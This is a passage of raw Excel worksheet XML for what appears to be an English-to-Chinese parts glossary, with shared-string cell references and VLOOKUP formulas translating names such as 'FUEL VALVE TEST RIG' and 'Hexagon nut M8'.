    <col min="15363" max="15366" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="15367" max="15616" width="9" style="61"/>
    <col min="15617" max="15617" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="15618" max="15618" width="6.625" style="61" customWidth="1"/>
    <col min="15619" max="15622" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="15623" max="15872" width="9" style="61"/>
    <col min="15873" max="15873" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="15874" max="15874" width="6.625" style="61" customWidth="1"/>
    <col min="15875" max="15878" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="15879" max="16128" width="9" style="61"/>
    <col min="16129" max="16129" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="16130" max="16130" width="6.625" style="61" customWidth="1"/>
    <col min="16131" max="16134" width="0" style="61" hidden="1" customWidth="1"/>
    <col min="16135" max="16384" width="9" style="61"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:3">
      <c r="B1" s="64" t="s">
        <v>47392</v>
      </c>
      <c r="C1" s="62" t="s">
        <v>47393</v>
      </c>
    </row>
    <row r="2" spans="2:3">
      <c r="B2" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C2" s="62" t="s">
        <v>47395</v>
      </c>
    </row>
    <row r="3" spans="2:3" ht="15.75">
      <c r="B3" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C3" s="63" t="s">
        <v>47396</v>
      </c>
    </row>
    <row r="4" spans="2:3">
      <c r="B4" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>47397</v>
      </c>
    </row>
    <row r="5" spans="2:3">
      <c r="B5" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>47398</v>
      </c>
    </row>
    <row r="6" spans="2:3">
      <c r="B6" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C6" s="62" t="s">
        <v>47399</v>
      </c>
    </row>
    <row r="7" spans="2:3">
      <c r="B7" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C7" s="62" t="s">
        <v>47400</v>
      </c>
    </row>
    <row r="8" spans="2:3">
      <c r="B8" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C8" s="62" t="s">
        <v>47401</v>
      </c>
    </row>
    <row r="9" spans="2:3">
      <c r="B9" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C9" s="62" t="s">
        <v>47402</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="15.75">
      <c r="B10" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C10" s="63" t="s">
        <v>47403</v>
      </c>
    </row>
    <row r="11" spans="2:3" ht="15.75">
      <c r="B11" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C11" s="63" t="s">
        <v>47404</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="15.75">
      <c r="B12" s="64" t="s">
        <v>47394</v>
      </c>
      <c r="C12" s="63" t="s">
        <v>47405</v>
      </c>
    </row>
    <row r="13" spans="2:3">
      <c r="B13" s="64" t="s">
        <v>47406</v>
      </c>
      <c r="C13" s="62" t="s">
        <v>47407</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="15.75">
      <c r="B14" s="64" t="s">
        <v>47408</v>
      </c>
      <c r="C14" s="63" t="s">
        <v>47402</v>
      </c>
    </row>
    <row r="15" spans="2:3" ht="15.75">
      <c r="B15" s="64" t="s">
        <v>47409</v>
      </c>
      <c r="C15" s="63" t="s">
        <v>47410</v>
      </c>
    </row>
    <row r="16" spans="2:3" ht="15.75">
      <c r="B16" s="64" t="s">
        <v>47411</v>
      </c>
      <c r="C16" s="63" t="s">
        <v>47403</v>
      </c>
    </row>
    <row r="17" spans="2:3" ht="15.75">
      <c r="B17" s="64" t="s">
        <v>47412</v>
      </c>
      <c r="C17" s="63" t="s">
        <v>47413</v>
      </c>
    </row>
    <row r="18" spans="2:3" ht="15.75">
      <c r="B18" s="64" t="s">
        <v>47414</v>
      </c>
      <c r="C18" s="63" t="s">
        <v>47415</v>
      </c>
    </row>
    <row r="19" spans="2:3" ht="15.75">
      <c r="B19" s="64" t="s">
        <v>47416</v>
      </c>
      <c r="C19" s="63" t="s">
        <v>47402</v>
      </c>
    </row>
    <row r="20" spans="2:3" ht="15.75">
      <c r="B20" s="64" t="s">
        <v>47417</v>
      </c>
      <c r="C20" s="63" t="s">
        <v>47410</v>
      </c>
    </row>
    <row r="21" spans="2:3">
      <c r="B21" s="64" t="s">
        <v>47418</v>
      </c>
      <c r="C21" s="62" t="s">
        <v>47419</v>
      </c>
    </row>
    <row r="22" spans="2:3">
      <c r="B22" s="64" t="s">
        <v>47420</v>
      </c>
      <c r="C22" s="62" t="s">
        <v>47421</v>
      </c>
    </row>
    <row r="23" spans="2:3" ht="15.75">
      <c r="B23" s="64" t="s">
        <v>47422</v>
      </c>
      <c r="C23" s="63" t="s">
        <v>47423</v>
      </c>
    </row>
    <row r="24" spans="2:3" ht="15.75">
      <c r="B24" s="64" t="s">
        <v>47424</v>
      </c>
      <c r="C24" s="63" t="s">
        <v>47425</v>
      </c>
    </row>
    <row r="25" spans="2:3">
      <c r="B25" s="64" t="s">
        <v>47426</v>
      </c>
      <c r="C25" s="62" t="s">
        <v>47427</v>
      </c>
    </row>
    <row r="26" spans="2:3" ht="15.75">
      <c r="B26" s="64" t="s">
        <v>47428</v>
      </c>
      <c r="C26" s="63" t="s">
        <v>47429</v>
      </c>
    </row>
    <row r="27" spans="2:3" ht="15.75">
      <c r="B27" s="64" t="s">
        <v>47430</v>
      </c>
      <c r="C27" s="63" t="s">
        <v>47431</v>
      </c>
    </row>
    <row r="28" spans="2:3" ht="15.75">
      <c r="B28" s="64" t="s">
        <v>47432</v>
      </c>
      <c r="C28" s="63" t="s">
        <v>47433</v>
      </c>
    </row>
    <row r="29" spans="2:3" ht="15.75">
      <c r="B29" s="64" t="s">
        <v>47434</v>
      </c>
      <c r="C29" s="63" t="s">
        <v>47435</v>
      </c>
    </row>
    <row r="30" spans="2:3" ht="15.75">
      <c r="B30" s="64" t="s">
        <v>47436</v>
      </c>
      <c r="C30" s="63" t="s">
        <v>47437</v>
      </c>
    </row>
    <row r="31" spans="2:3" ht="15.75">
      <c r="B31" s="64" t="s">
        <v>47438</v>
      </c>
      <c r="C31" s="63" t="s">
        <v>47439</v>
      </c>
    </row>
    <row r="32" spans="2:3" ht="15.75">
      <c r="B32" s="64" t="s">
        <v>47440</v>
      </c>
      <c r="C32" s="63" t="s">
        <v>47441</v>
      </c>
    </row>
    <row r="33" spans="2:3" ht="15.75">
      <c r="B33" s="64" t="s">
        <v>47442</v>
      </c>
      <c r="C33" s="63" t="s">
        <v>47443</v>
      </c>
    </row>
    <row r="34" spans="2:3" ht="15.75">
      <c r="B34" s="64" t="s">
        <v>47444</v>
      </c>
      <c r="C34" s="63" t="s">
        <v>47445</v>
      </c>
    </row>
    <row r="35" spans="2:3">
      <c r="B35" s="64" t="s">
        <v>47446</v>
      </c>
      <c r="C35" s="62" t="s">
        <v>47410</v>
      </c>
    </row>
    <row r="36" spans="2:3" ht="15.75">
      <c r="B36" s="64" t="s">
        <v>47447</v>
      </c>
      <c r="C36" s="63" t="s">
        <v>47448</v>
      </c>
    </row>
    <row r="37" spans="2:3">
      <c r="B37" s="64" t="s">
        <v>47449</v>
      </c>
      <c r="C37" s="62" t="s">
        <v>47450</v>
      </c>
    </row>
    <row r="38" spans="2:3">
      <c r="B38" s="64" t="s">
        <v>47451</v>
      </c>
      <c r="C38" s="62" t="s">
        <v>47452</v>
      </c>
    </row>
    <row r="39" spans="2:3">
      <c r="B39" s="64" t="s">
        <v>47453</v>
      </c>
      <c r="C39" s="62" t="s">
        <v>47454</v>
      </c>
    </row>
    <row r="40" spans="2:3">
      <c r="B40" s="64" t="s">
        <v>47455</v>
      </c>
      <c r="C40" s="62" t="s">
        <v>47456</v>
      </c>
    </row>
    <row r="41" spans="2:3">
      <c r="B41" s="64" t="s">
        <v>47457</v>
      </c>
      <c r="C41" s="62" t="s">
        <v>47458</v>
      </c>
    </row>
    <row r="42" spans="2:3">
      <c r="B42" s="64" t="s">
        <v>47459</v>
      </c>
      <c r="C42" s="62" t="s">
        <v>47460</v>
      </c>
    </row>
    <row r="43" spans="2:3" ht="15.75">
      <c r="B43" s="64" t="s">
        <v>47461</v>
      </c>
      <c r="C43" s="63" t="s">
        <v>47462</v>
      </c>
    </row>
    <row r="44" spans="2:3" ht="15.75">
      <c r="B44" s="64" t="s">
        <v>47463</v>
      </c>
      <c r="C44" s="63" t="s">
        <v>47464</v>
      </c>
    </row>
    <row r="45" spans="2:3" ht="15.75">
      <c r="B45" s="64" t="s">
        <v>47465</v>
      </c>
      <c r="C45" s="63" t="s">
        <v>47466</v>
      </c>
    </row>
    <row r="46" spans="2:3">
      <c r="B46" s="64" t="s">
        <v>47467</v>
      </c>
      <c r="C46" s="62" t="s">
        <v>47468</v>
      </c>
    </row>
    <row r="47" spans="2:3">
      <c r="B47" s="64" t="s">
        <v>47469</v>
      </c>
      <c r="C47" s="62" t="s">
        <v>47470</v>
      </c>
    </row>
    <row r="48" spans="2:3">
      <c r="B48" s="64" t="s">
        <v>47471</v>
      </c>
      <c r="C48" s="62" t="s">
        <v>47472</v>
      </c>
    </row>
    <row r="49" spans="2:3">
      <c r="B49" s="64" t="s">
        <v>47473</v>
      </c>
      <c r="C49" s="62" t="s">
        <v>47474</v>
      </c>
    </row>
    <row r="50" spans="2:3">
      <c r="B50" s="64" t="s">
        <v>47475</v>
      </c>
      <c r="C50" s="62" t="s">
        <v>47476</v>
      </c>
    </row>
    <row r="51" spans="2:3" ht="15.75">
      <c r="B51" s="64" t="s">
        <v>47477</v>
      </c>
      <c r="C51" s="63" t="s">
        <v>47478</v>
      </c>
    </row>
    <row r="52" spans="2:3" ht="15.75">
      <c r="B52" s="64" t="s">
        <v>47479</v>
      </c>
      <c r="C52" s="62" t="s">
        <v>47480</v>
      </c>
    </row>
    <row r="53" spans="2:3" ht="15.75">
      <c r="B53" s="64" t="s">
        <v>47481</v>
      </c>
      <c r="C53" s="63" t="s">
        <v>47482</v>
      </c>
    </row>
    <row r="54" spans="2:3" ht="15.75">
      <c r="B54" s="64" t="s">
        <v>47483</v>
      </c>
      <c r="C54" s="63" t="s">
        <v>47484</v>
      </c>
    </row>
    <row r="55" spans="2:3" ht="15.75">
      <c r="B55" s="64" t="s">
        <v>47485</v>
      </c>
      <c r="C55" s="63" t="s">
        <v>47486</v>
      </c>
    </row>
    <row r="56" spans="2:3" ht="15.75">
      <c r="B56" s="64" t="s">
        <v>47487</v>
      </c>
      <c r="C56" s="63" t="s">
        <v>47488</v>
      </c>
    </row>
    <row r="57" spans="2:3" ht="15.75">
      <c r="B57" s="64" t="s">
        <v>47489</v>
      </c>
      <c r="C57" s="63" t="s">
        <v>47490</v>
      </c>
    </row>
    <row r="58" spans="2:3" ht="15.75">
      <c r="B58" s="64" t="s">
        <v>47491</v>
      </c>
      <c r="C58" s="63" t="s">
        <v>47492</v>
      </c>
    </row>
    <row r="59" spans="2:3" ht="15.75">
      <c r="B59" s="64" t="s">
        <v>47493</v>
      </c>
      <c r="C59" s="63" t="s">
        <v>47494</v>
      </c>
    </row>
    <row r="60" spans="2:3" ht="15.75">
      <c r="B60" s="64" t="s">
        <v>47495</v>
      </c>
      <c r="C60" s="63" t="s">
        <v>47496</v>
      </c>
    </row>
    <row r="61" spans="2:3" ht="15.75">
      <c r="B61" s="64" t="s">
        <v>47497</v>
      </c>
      <c r="C61" s="63" t="s">
        <v>47498</v>
      </c>
    </row>
    <row r="62" spans="2:3" ht="15.75">
      <c r="B62" s="64" t="s">
        <v>47499</v>
      </c>
      <c r="C62" s="63" t="s">
        <v>47500</v>
      </c>
    </row>
    <row r="63" spans="2:3">
      <c r="B63" s="64" t="s">
        <v>47501</v>
      </c>
      <c r="C63" s="62" t="s">
        <v>47502</v>
      </c>
    </row>
    <row r="64" spans="2:3">
      <c r="B64" s="64" t="s">
        <v>47503</v>
      </c>
      <c r="C64" s="62" t="s">
        <v>47504</v>
      </c>
    </row>
    <row r="65" spans="2:3">
      <c r="B65" s="64" t="s">
        <v>47505</v>
      </c>
      <c r="C65" s="62" t="s">
        <v>47506</v>
      </c>
    </row>
    <row r="66" spans="2:3">
      <c r="B66" s="64" t="s">
        <v>47507</v>
      </c>
      <c r="C66" s="62" t="s">
        <v>47508</v>
      </c>
    </row>
    <row r="67" spans="2:3">
      <c r="B67" s="64" t="s">
        <v>47509</v>
      </c>
      <c r="C67" s="62" t="s">
        <v>47402</v>
      </c>
    </row>
    <row r="68" spans="2:3" ht="15.75">
      <c r="B68" s="64" t="s">
        <v>47510</v>
      </c>
      <c r="C68" s="63" t="s">
        <v>47511</v>
      </c>
    </row>
    <row r="69" spans="2:3" ht="15.75">
      <c r="B69" s="64" t="s">
        <v>47512</v>
      </c>
      <c r="C69" s="63" t="s">
        <v>47513</v>
      </c>
    </row>
    <row r="70" spans="2:3" ht="15.75">
      <c r="B70" s="64" t="s">
        <v>47514</v>
      </c>
      <c r="C70" s="63" t="s">
        <v>47515</v>
      </c>
    </row>
    <row r="71" spans="2:3" ht="15.75">
      <c r="B71" s="64" t="s">
        <v>47516</v>
      </c>
      <c r="C71" s="63" t="s">
        <v>47517</v>
      </c>
    </row>
    <row r="72" spans="2:3" ht="15.75">
      <c r="B72" s="64" t="s">
        <v>47518</v>
      </c>
      <c r="C72" s="63" t="s">
        <v>47519</v>
      </c>
    </row>
    <row r="73" spans="2:3" ht="15.75">
      <c r="B73" s="64" t="s">
        <v>47520</v>
      </c>
      <c r="C73" s="63" t="s">
        <v>47521</v>
      </c>
    </row>
    <row r="74" spans="2:3">
      <c r="B74" s="64" t="s">
        <v>47522</v>
      </c>
      <c r="C74" s="62" t="s">
        <v>47523</v>
      </c>
    </row>
    <row r="75" spans="2:3" ht="15.75">
      <c r="B75" s="64" t="s">
        <v>47524</v>
      </c>
      <c r="C75" s="63" t="s">
        <v>47525</v>
      </c>
    </row>
    <row r="76" spans="2:3" ht="15.75">
      <c r="B76" s="64" t="s">
        <v>47526</v>
      </c>
      <c r="C76" s="63" t="s">
        <v>47527</v>
      </c>
    </row>
    <row r="77" spans="2:3">
      <c r="B77" s="64" t="s">
        <v>47528</v>
      </c>
      <c r="C77" s="62" t="s">
        <v>47529</v>
      </c>
    </row>
    <row r="78" spans="2:3" ht="15.75">
      <c r="B78" s="64" t="s">
        <v>47530</v>
      </c>
      <c r="C78" s="63" t="s">
        <v>47490</v>
      </c>
    </row>
    <row r="79" spans="2:3" ht="15.75">
      <c r="B79" s="64" t="s">
        <v>47531</v>
      </c>
      <c r="C79" s="63" t="s">
        <v>47492</v>
      </c>
    </row>
    <row r="80" spans="2:3">
      <c r="B80" s="64" t="s">
        <v>47532</v>
      </c>
      <c r="C80" s="62" t="s">
        <v>47533</v>
      </c>
    </row>
    <row r="81" spans="2:3" ht="15.75">
      <c r="B81" s="64" t="s">
        <v>47534</v>
      </c>
      <c r="C81" s="63" t="s">
        <v>47535</v>
      </c>
    </row>
    <row r="82" spans="2:3">
      <c r="B82" s="64" t="s">
        <v>47536</v>
      </c>
      <c r="C82" s="62" t="s">
        <v>47537</v>
      </c>
    </row>
    <row r="83" spans="2:3">
      <c r="B83" s="64" t="s">
        <v>47538</v>
      </c>
    </row>
    <row r="84" spans="2:3">
      <c r="B84" s="64" t="s">
        <v>47539</v>
      </c>
    </row>
    <row r="85" spans="2:3">
      <c r="B85" s="64" t="s">
        <v>47540</v>
      </c>
    </row>
    <row r="86" spans="2:3">
      <c r="B86" s="64" t="s">
        <v>47541</v>
      </c>
    </row>
    <row r="87" spans="2:3">
      <c r="B87" s="64" t="s">
        <v>47542</v>
      </c>
    </row>
    <row r="88" spans="2:3">
      <c r="B88" s="64" t="s">
        <v>47543</v>
      </c>
    </row>
    <row r="89" spans="2:3">
      <c r="B89" s="64" t="s">
        <v>47544</v>
      </c>
    </row>
    <row r="90" spans="2:3">
      <c r="B90" s="64" t="s">
        <v>47545</v>
      </c>
    </row>
    <row r="91" spans="2:3">
      <c r="B91" s="64" t="s">
        <v>47546</v>
      </c>
    </row>
    <row r="92" spans="2:3">
      <c r="B92" s="64" t="s">
        <v>47547</v>
      </c>
    </row>
    <row r="93" spans="2:3">
      <c r="B93" s="64" t="s">
        <v>47548</v>
      </c>
    </row>
    <row r="94" spans="2:3">
      <c r="B94" s="64" t="s">
        <v>47549</v>
      </c>
    </row>
    <row r="95" spans="2:3">
      <c r="B95" s="64" t="s">
        <v>47550</v>
      </c>
    </row>
    <row r="96" spans="2:3">
      <c r="B96" s="64" t="s">
        <v>47551</v>
      </c>
    </row>
    <row r="97" spans="2:2">
      <c r="B97" s="64" t="s">
        <v>47552</v>
      </c>
    </row>
    <row r="98" spans="2:2">
      <c r="B98" s="64" t="s">
        <v>47553</v>
      </c>
    </row>
    <row r="99" spans="2:2">
      <c r="B99" s="64" t="s">
        <v>47554</v>
      </c>
    </row>
    <row r="100" spans="2:2">
      <c r="B100" s="64" t="s">
        <v>47555</v>
      </c>
    </row>
    <row r="101" spans="2:2">
      <c r="B101" s="64" t="s">
        <v>47556</v>
      </c>
    </row>
    <row r="102" spans="2:2">
      <c r="B102" s="64" t="s">
        <v>47557</v>
      </c>
    </row>
    <row r="103" spans="2:2">
      <c r="B103" s="64" t="s">
        <v>47558</v>
      </c>
    </row>
    <row r="104" spans="2:2">
      <c r="B104" s="64" t="s">
        <v>47559</v>
      </c>
    </row>
    <row r="105" spans="2:2">
      <c r="B105" s="64" t="s">
        <v>47560</v>
      </c>
    </row>
    <row r="106" spans="2:2">
      <c r="B106" s="64" t="s">
        <v>47561</v>
      </c>
    </row>
    <row r="107" spans="2:2">
      <c r="B107" s="64" t="s">
        <v>47562</v>
      </c>
    </row>
    <row r="108" spans="2:2">
      <c r="B108" s="64" t="s">
        <v>47563</v>
      </c>
    </row>
    <row r="109" spans="2:2">
      <c r="B109" s="64" t="s">
        <v>47564</v>
      </c>
    </row>
    <row r="110" spans="2:2">
      <c r="B110" s="64" t="s">
        <v>47565</v>
      </c>
    </row>
    <row r="111" spans="2:2">
      <c r="B111" s="64" t="s">
        <v>47566</v>
      </c>
    </row>
    <row r="112" spans="2:2">
      <c r="B112" s="64" t="s">
        <v>47567</v>
      </c>
    </row>
    <row r="113" spans="2:2">
      <c r="B113" s="64" t="s">
        <v>47568</v>
      </c>
    </row>
    <row r="114" spans="2:2">
      <c r="B114" s="64" t="s">
        <v>47569</v>
      </c>
    </row>
    <row r="115" spans="2:2">
      <c r="B115" s="64" t="s">
        <v>47570</v>
      </c>
    </row>
    <row r="116" spans="2:2">
      <c r="B116" s="64" t="s">
        <v>47571</v>
      </c>
    </row>
    <row r="117" spans="2:2">
      <c r="B117" s="64" t="s">
        <v>47572</v>
      </c>
    </row>
    <row r="118" spans="2:2">
      <c r="B118" s="64" t="s">
        <v>47573</v>
      </c>
    </row>
    <row r="119" spans="2:2">
      <c r="B119" s="64" t="s">
        <v>47574</v>
      </c>
    </row>
    <row r="120" spans="2:2">
      <c r="B120" s="64" t="s">
        <v>47575</v>
      </c>
    </row>
    <row r="121" spans="2:2">
      <c r="B121" s="64" t="s">
        <v>47576</v>
      </c>
    </row>
    <row r="122" spans="2:2">
      <c r="B122" s="64" t="s">
        <v>47577</v>
      </c>
    </row>
    <row r="123" spans="2:2">
      <c r="B123" s="64" t="s">
        <v>47578</v>
      </c>
    </row>
    <row r="124" spans="2:2">
      <c r="B124" s="64" t="s">
        <v>47579</v>
      </c>
    </row>
    <row r="125" spans="2:2">
      <c r="B125" s="64" t="s">
        <v>47580</v>
      </c>
    </row>
    <row r="126" spans="2:2">
      <c r="B126" s="64" t="s">
        <v>47581</v>
      </c>
    </row>
    <row r="127" spans="2:2">
      <c r="B127" s="64" t="s">
        <v>47582</v>
      </c>
    </row>
    <row r="128" spans="2:2">
      <c r="B128" s="64" t="s">
        <v>47583</v>
      </c>
    </row>
    <row r="129" spans="2:2">
      <c r="B129" s="64" t="s">
        <v>47584</v>
      </c>
    </row>
    <row r="130" spans="2:2">
      <c r="B130" s="64" t="s">
        <v>47585</v>
      </c>
    </row>
    <row r="131" spans="2:2">
      <c r="B131" s="64" t="s">
        <v>47586</v>
      </c>
    </row>
    <row r="132" spans="2:2">
      <c r="B132" s="64" t="s">
        <v>47587</v>
      </c>
    </row>
    <row r="133" spans="2:2">
      <c r="B133" s="64" t="s">
        <v>47588</v>
      </c>
    </row>
    <row r="134" spans="2:2">
      <c r="B134" s="64" t="s">
        <v>47589</v>
      </c>
    </row>
    <row r="135" spans="2:2">
      <c r="B135" s="64" t="s">
        <v>47590</v>
      </c>
    </row>
    <row r="136" spans="2:2">
      <c r="B136" s="64" t="s">
        <v>47591</v>
      </c>
    </row>
    <row r="137" spans="2:2">
      <c r="B137" s="64" t="s">
        <v>47592</v>
      </c>
    </row>
    <row r="138" spans="2:2">
      <c r="B138" s="64" t="s">
        <v>47593</v>
      </c>
    </row>
    <row r="139" spans="2:2">
      <c r="B139" s="64" t="s">
        <v>47594</v>
      </c>
    </row>
    <row r="140" spans="2:2">
      <c r="B140" s="64" t="s">
        <v>47595</v>
      </c>
    </row>
    <row r="141" spans="2:2">
      <c r="B141" s="64" t="s">
        <v>47596</v>
      </c>
    </row>
    <row r="142" spans="2:2">
      <c r="B142" s="64" t="s">
        <v>47597</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="3" type="noConversion"/>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Z21443"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="C17" sqref="C17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="68.75" style="1" customWidth="1"/>
    <col min="2" max="2" width="59.5" style="1" customWidth="1"/>
    <col min="3" max="3" width="51" style="29" customWidth="1"/>
    <col min="4" max="16384" width="9" style="6"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:26">
      <c r="A1" s="54" t="s">
        <v>46836</v>
      </c>
      <c r="B1" s="54" t="s">
        <v>55724</v>
      </c>
      <c r="C1" s="55" t="s">
        <v>28175</v>
      </c>
    </row>
    <row r="2" spans="1:26">
      <c r="A2" s="1">
        <v>257728</v>
      </c>
      <c r="B2" s="1">
        <v>257728</v>
      </c>
      <c r="C2" s="29" t="s">
        <v>47840</v>
      </c>
      <c r="Z2" s="6" t="str">
        <f>VLOOKUP("Incomplete_Part",A:B,2,0)</f>
        <v>未完成</v>
      </c>
    </row>
    <row r="3" spans="1:26">
      <c r="A3" s="1">
        <v>505181</v>
      </c>
      <c r="B3" s="1">
        <v>505181</v>
      </c>
      <c r="C3" s="29" t="s">
        <v>47367</v>
      </c>
      <c r="Z3" s="6" t="str">
        <f>VLOOKUP("FUEL VALVE TEST RIG",A:B,2,0)</f>
        <v>喷油器试验台</v>
      </c>
    </row>
    <row r="4" spans="1:26">
      <c r="A4" s="1">
        <v>520227</v>
      </c>
      <c r="B4" s="1">
        <v>520227</v>
      </c>
      <c r="C4" s="29" t="s">
        <v>47366</v>
      </c>
    </row>
    <row r="5" spans="1:26">
      <c r="A5" s="1" t="s">
        <v>36791</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>36791</v>
      </c>
      <c r="Z5" s="6" t="str">
        <f>VLOOKUP("Hexagon nut M8",A:B,2,0)</f>
        <v>螺母</v>
      </c>
    </row>
    <row r="6" spans="1:26">
      <c r="A6" s="1" t="s">
        <v>21948</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>43103</v>
      </c>
    </row>
    <row r="7" spans="1:26">
      <c r="A7" s="1" t="s">
        <v>19647</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>42256</v>
      </c>
    </row>
    <row r="8" spans="1:26">
      <c r="A8" s="1" t="s">
        <v>25479</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>44533</v>
      </c>
      <c r="Z8" s="6" t="str">
        <f>VLOOKUP("SPONGE RUBBER RING",A:B,2,0)</f>
        <v>海棉橡胶圈</v>
      </c>
    </row>
    <row r="9" spans="1:26">
      <c r="A9" s="1" t="s">
        <v>36371</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>55725</v>
      </c>
    </row>
    <row r="10" spans="1:26">
      <c r="A10" s="1" t="s">
        <v>32904</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>55726</v>
      </c>
    </row>
    <row r="11" spans="1:26">
      <c r="A11" s="1" t="s">
        <v>30910</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>55727</v>
      </c>
    </row>
    <row r="12" spans="1:26">
      <c r="A12" s="1" t="s">
        <v>35064</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>55728</v>
      </c>
    </row>
    <row r="13" spans="1:26">
      <c r="A13" s="1" t="s">
        <v>33874</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>55729</v>
      </c>
    </row>
    <row r="14" spans="1:26">
      <c r="A14" s="1" t="s">
        <v>33936</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>55730</v>
      </c>
    </row>
    <row r="15" spans="1:26">
      <c r="A15" s="1" t="s">
        <v>33797</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>55730</v>
      </c>
    </row>
    <row r="16" spans="1:26">
      <c r="A16" s="1" t="s">
        <v>36415</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>55731</v>
      </c>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" s="1" t="s">
        <v>36417</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>55732</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="A18" s="1" t="s">
        <v>36418</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>55733</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="A19" s="1" t="s">
        <v>36419</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>55734</v>
      </c>
    </row>
    <row r="20" spans="1:3">
      <c r="A20" s="1" t="s">
        <v>36421</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>55735</v>
      </c>
    </row>
    <row r="21" spans="1:3">
      <c r="A21" s="1" t="s">
        <v>36422</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>55736</v>
      </c>
    </row>
    <row r="22" spans="1:3">
      <c r="A22" s="1" t="s">
        <v>36420</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>55737</v>
      </c>
    </row>
    <row r="23" spans="1:3">
      <c r="A23" s="1" t="s">
        <v>36428</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>55738</v>
      </c>
    </row>
    <row r="24" spans="1:3">
      <c r="A24" s="1" t="s">
        <v>36430</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>55739</v>
      </c>
    </row>
    <row r="25" spans="1:3">
      <c r="A25" s="1" t="s">
        <v>36427</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>55740</v>
      </c>
    </row>
    <row r="26" spans="1:3">
      <c r="A26" s="1" t="s">
        <v>47906</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>55741</v>
      </c>
      <c r="C26" s="29" t="s">
        <v>47907</v>
      </c>
    </row>
    <row r="27" spans="1:3">
      <c r="A27" s="1" t="s">
        <v>36426</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>55742</v>
      </c>
    </row>
    <row r="28" spans="1:3">
      <c r="A28" s="1" t="s">
        <v>36425</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>55743</v>
      </c>
    </row>
    <row r="29" spans="1:3">
      <c r="A29" s="1" t="s">
        <v>36424</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>55744</v>
      </c>
    </row>
    <row r="30" spans="1:3">
      <c r="A30" s="1" t="s">
        <v>36429</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>55745</v>
      </c>
    </row>
    <row r="31" spans="1:3">
      <c r="A31" s="1" t="s">
        <v>47319</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>47992</v>
      </c>
      <c r="C31" s="29" t="s">
        <v>47320</v>
      </c>
    </row>
    <row r="32" spans="1:3">
      <c r="A32" s="52" t="s">
        <v>5303</v>
      </c>
      <c r="B32" s="52" t="s">
        <v>40409</v>
      </c>
    </row>
    <row r="33" spans="1:3">
      <c r="A33" s="52" t="s">
        <v>5302</v>
      </c>
      <c r="B33" s="52" t="s">
        <v>40408</v>
      </c>
    </row>
    <row r="34" spans="1:3">
      <c r="A34" s="1" t="s">
        <v>30339</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>48378</v>
      </c>
    </row>
    <row r="35" spans="1:3">
      <c r="A35" s="1" t="s">
        <v>21325</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>42866</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="1" t="s">
        <v>32182</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>48379</v>
      </c>
    </row>
    <row r="37" spans="1:3">
      <c r="A37" s="1" t="s">
        <v>32280</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>48380</v>
      </c>
    </row>
    <row r="38" spans="1:3">
      <c r="A38" s="1" t="s">
        <v>21415</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>42903</v>
      </c>
    </row>
    <row r="39" spans="1:3">
      <c r="A39" s="1" t="s">
        <v>29846</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>48381</v>
      </c>
    </row>
    <row r="40" spans="1:3">
      <c r="A40" s="1" t="s">
        <v>30536</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>48382</v>
      </c>
    </row>
    <row r="41" spans="1:3">
